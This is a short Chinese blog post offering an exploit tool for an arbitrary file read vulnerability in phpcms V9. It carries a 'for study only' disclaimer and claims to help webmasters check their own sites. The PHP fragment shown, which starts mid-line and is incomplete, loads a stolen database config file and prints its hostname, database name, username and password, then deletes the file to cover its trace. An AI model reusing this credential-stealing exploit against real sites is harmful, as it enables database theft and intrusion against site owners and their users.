phpcmsV9任意读文件漏洞利用工具
- 发表于
- Vulndb
注意:本程序带有攻击性,仅供学习研究请勿当作非法工具使用,否则后果自负,于本人无关!
睡觉前去论坛上面看了下,爆出 phpcmsV9最新任意读文件漏洞 ,第一反映就是
完了,估计互联网上又不知道多少万用户数据被脱了~~
自己就写了一个此漏洞的检测工具方便站长们检测自己的站点是否存在漏洞。
代码:
')){
showInfo();
echo 'Not found !';
exit();
};
$database = include 'expDatabase.php';
showInfo();
$out = 'HostName: '.$database['default']['hostname']."n";
$out .='DataBase:'. $database['default']['database']."n";
$out .='UserName:'. $database['default']['username']."n";
$out .='Password:'. $database['default']['password']."n";
if(!empty($database)){
echo "Found it! :nn";
echo $out;
}
@unlink('expDatabase.php');
}
原文连接:phpcmsV9任意读文件漏洞利用工具
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。